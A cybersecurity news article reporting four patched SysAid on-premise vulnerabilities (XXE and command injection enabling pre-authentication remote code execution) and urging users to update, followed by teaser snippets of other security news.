SysAid Addresses Four Critical Vulnerabilities Allowing Pre-Authentication Remote Code Execution in On-Premise Deployment
Cybersecurity researchers have recently identified several vulnerabilities in the on-premise version of SysAid IT support software. These weaknesses could potentially allow hostile actors to execute pre-authenticated remote code with elevated privileges.
The vulnerabilities are tracked as CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777, classified as XML External Entity (XXE) injections. These attacks occur when an attacker successfully manipulates an application’s XML input parsing.
Exploiting these vulnerabilities could enable attackers to inject unsafe XML entities into the web application, leading to Server-Side Request Forgery (SSRF) attacks and, in some cases, remote code execution.
Details regarding the vulnerabilities, as reported by researchers at watchTowr Labs, are as follows:
– CVE-2025-2775 and CVE-2025-2776 involve pre-authenticated XXE through the /mdm/checkin endpoint.
– CVE-2025-2777 concerns a pre-authenticated XXE through the /lshw endpoint.
Researchers have noted that these vulnerabilities are straightforward to exploit via specially crafted HTTP POST requests directed at the vulnerable endpoints.
Successful exploitation could allow an attacker to access local files containing sensitive data, including SysAid’s “InitAccount.cmd,” which holds information about the administrator username and plaintext password created during installation. With this information, an attacker could gain full administrative access to SysAid.
Moreover, these XXE vulnerabilities could potentially be combined with another command injection vulnerability, identified as CVE-2025-2778, to achieve remote code execution.
All four vulnerabilities have been addressed by SysAid in the release of on-premise version 24.4.60 b16, which became available in early March 2025. A proof-of-concept exploit that leverages these vulnerabilities has also been made public.
Given that security flaws in SysAid, such as CVE-2023-47246, have been previously exploited by ransomware groups, it is crucial for users to update their instances to the latest version to mitigate risks.
The UK government’s flagship cyber-resilience initiative has reached a significant milestone, with quarterly certifications for the Cyber Essentials scheme surpassing…
Russian hackers have successfully circumvented Google’s multi-factor authentication (MFA) in Gmail to execute targeted attacks. This finding comes from security…
Are you currently utilizing a shared network drive for storing sensitive information? If so, it is critical to recognize that…
Recent reports have emerged regarding a significant breach, touted as the “mother of all breaches,” which quickly garnered extensive media…
Cybersecurity researchers have identified two significant local privilege escalation (LPE) vulnerabilities that could potentially allow unauthorized access to root privileges…
The first half of 2025 has witnessed the decline and fall of multiple previously dominant ransomware groups such as LockBit,…
OpenAI is set to release an update for ChatGPT that will activate the new o3 Pro model, which boasts enhanced…
Microsoft has released the KB5058481 preview cumulative update for Windows 10 22H2, which introduces several enhancements, including the restoration of…
Recent discoveries have identified two critical vulnerabilities in the open-source forum software vBulletin, one of which is confirmed to be…